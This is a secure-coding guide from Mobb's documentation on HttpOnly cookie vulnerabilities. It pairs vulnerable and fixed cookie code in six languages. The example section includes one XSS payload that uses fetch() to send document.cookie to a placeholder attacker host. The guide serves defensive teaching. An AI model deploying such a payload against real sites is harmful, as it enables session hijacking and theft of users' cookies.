Mobb User Docs
Start NowBlogsWatch NowContact Us
  • What is Mobb?
  • What's New with Mobb
  • Supported Fixes
  • Getting Started
    • System Requirements
    • Onboarding Guide
      • Registering a Mobb account
      • Try Mobb now!
      • Running Mobb against your own code
      • Automate Mobb in a CI/CD pipeline
    • Working with the Fix Report
    • Mobb CLI Overview
      • Analyze Mode
      • Scan Mode
      • Add SCM Token Mode
      • Review Mode
      • Common Deployment Scenarios
  • Mobb Dashboard
  • Integrating SAST Findings
    • Checkmarx
      • Generating Checkmarx One JSON Report from CLI
    • Snyk
    • SonarQube
      • Generating a SonarQube SAST Report
    • Fortify
    • CodeQL
    • Semgrep/Opengrep
      • Generating a Semgrep SAST Report
      • Generating an Opengrep SAST Report
  • CI/CD Integrations
    • GitHub Actions
      • GitHub Fixer for CxOne
      • GitHub Fixer for Opengrep
    • GitLab Pipeline
    • Azure DevOps
    • Jenkins
    • CircleCI
    • Bamboo
    • Bitbucket Pipeline
  • Administration
    • User Management
    • Project Settings
    • Access Tokens
    • Organization-Level Fix Policy
    • Integrations Page
    • SAML Single Sign-On Flow
  • More Info
    • Mobb Broker
      • Mobb Broker Token Rotation
      • Secure storage of Mobb broker in AWS Secrets Manager
    • Providing Fix Feedback
    • Frequently Asked Questions (FAQ)
    • Data Protection and Retention
    • Service Level Agreement
  • Fixing Guides
    • SQL Injection
    • Path Traversal
    • Log Forging
    • XSS
    • XXE
    • Server Side Request Forgery
    • HttpOnly Cookie Vulnerabilities
    • Hardcoded Domain in HTML
    • Hardcoded Secrets
    • HTTP Response Splitting Attacks
    • Insecure Cookie Vulnerabilities
    • Insecure Randomness
    • Missing Check against Null
    • Missing Rate Limiting
    • Regex Missing Timeout
    • System Information Leakage
  • Mobb REST API Guide
Powered by GitBook
On this page
  • What is HttpOnly Cookie and Why is it Important?
  • One Simple HttpOnly Cookie Vulnerability Example
  • HttpOnly Cookie Prevention Methods: How to Fix Your Code
  • Code Samples
  • Need more help in preventing HttpOnly Cookie vulnerabilities?
  • We'd love your feedback!

Was this helpful?

  1. Fixing Guides

HttpOnly Cookie Vulnerabilities

Learn how to prevent HttpOnly cookie vulnerabilities with real code examples and best practices. Protect your web applications from session hijacking and XSS attacks.

Tools recognizing this:

Opengrep Fortify Checkmarx SonarQube Snyk Semgrep CodeQL

What is HttpOnly Cookie and Why is it Important?

The HttpOnly flag is a security feature that helps prevent client-side access to cookie data through JavaScript. When a cookie is set with the HttpOnly flag, it becomes inaccessible to client-side scripting languages like JavaScript, helping protect against Cross-Site Scripting (XSS) attacks.

Without the HttpOnly flag, cookies are vulnerable to:

  • Theft through XSS attacks

  • Session hijacking

  • Unauthorized access to sensitive cookie data

  • Client-side manipulation of cookie values

This guide covers HttpOnly cookie vulnerabilities, examples, prevention methods, and how to properly secure cookies in your applications.

One Simple HttpOnly Cookie Vulnerability Example

Consider this basic example of setting a cookie:

Cookie cookie = new Cookie("sessionId", sessionValue);
response.addCookie(cookie);

An attacker exploiting an XSS vulnerability could steal this cookie using JavaScript:

<script>fetch('https://attacker.com?cookie='+document.cookie)</script>

The cookie data would be accessible because the HttpOnly flag is not set, allowing the attacker to hijack the user's session.

HttpOnly Cookie Prevention Methods: How to Fix Your Code

The most effective way to fix HttpOnly cookie vulnerabilities is to explicitly set the HttpOnly flag when creating cookies. This ensures that the cookie cannot be accessed through client-side scripts, providing an additional layer of security against XSS attacks.

Code Samples

Vulnerable Code

Cookie cookie = new Cookie("sessionId", sessionValue);

Fixed Code

Cookie cookie = new Cookie("sessionId", sessionValue);
cookie.setHttpOnly(true);
response.addCookie(cookie);

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly flag.The fix explicitly sets the HttpOnly flag using setHttpOnly(true).This prevents JavaScript access to the cookie.The cookie becomes more resistant to XSS attacks.

Vulnerable Code

res.cookie('sessionId', sessionValue, {
    secure: true,
    maxAge: 3600000
});

Fixed Code

res.cookie('sessionId', sessionValue, {
    secure: true,
    httpOnly: true,
    maxAge: 3600000
});

Fix Explanation

The vulnerable code sets a cookie without the HttpOnly flag.The fix adds the httpOnly option to the cookie configuration.This prevents client-side JavaScript from accessing the cookie.The cookie becomes more secure against XSS attacks.

Vulnerable Code

response.set_cookie('sessionId', session_value,
    secure=True,
    max_age=3600
)

Fixed Code

response.set_cookie('sessionId', session_value,
    secure=True,
    httponly=True,
    max_age=3600
)

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly flag.The fix adds the httponly parameter set to True.This prevents JavaScript from accessing the cookie.The cookie becomes protected against client-side script access.

Vulnerable Code

HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
Response.Cookies.Add(cookie);

Fixed Code

HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
cookie.HttpOnly = true;
Response.Cookies.Add(cookie);

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly property.The fix sets the HttpOnly property to true.This prevents client-side access to the cookie.The cookie becomes more secure against XSS attacks.

Vulnerable Code

setcookie("sessionId", $sessionValue,
    time() + 3600,
    "/",
    "example.com",
    true
);

Fixed Code

setcookie("sessionId", $sessionValue,
    time() + 3600,
    "/",
    "example.com",
    true,
    true
);

Fix Explanation

The vulnerable code sets a cookie without the HttpOnly flag.The fix adds true as the last parameter to enable HttpOnly.This prevents JavaScript access to the cookie.The cookie becomes protected against client-side access.

Vulnerable Code

cookies[:session_id] = {
  value: session_value,
  expires: 1.hour.from_now,
  secure: true
}

Fixed Code

cookies[:session_id] = {
  value: session_value,
  expires: 1.hour.from_now,
  secure: true,
  httponly: true
}

Fix Explanation

The vulnerable code creates a cookie without the HttpOnly flag.The fix adds the httponly: true option to the cookie.This prevents JavaScript from accessing the cookie.The cookie becomes more secure against XSS attacks.

Need more help in preventing HttpOnly Cookie vulnerabilities?

We'd love your feedback!

We're excited to hear your thoughts and ideas about fixing vulnerabilities.

PreviousServer Side Request ForgeryNextHardcoded Domain in HTML

Last updated 2 months ago

Was this helpful?

supports fixing many forms of HttpOnly Cookie vulnerabilities, and can mitigate your issues in batch.

Start now for free at

or if you have any corrections, questions or suggestions. Start now for free at https://app.mobb.ai

Mobb
app.mobb.ai
Book a meeting
Contact us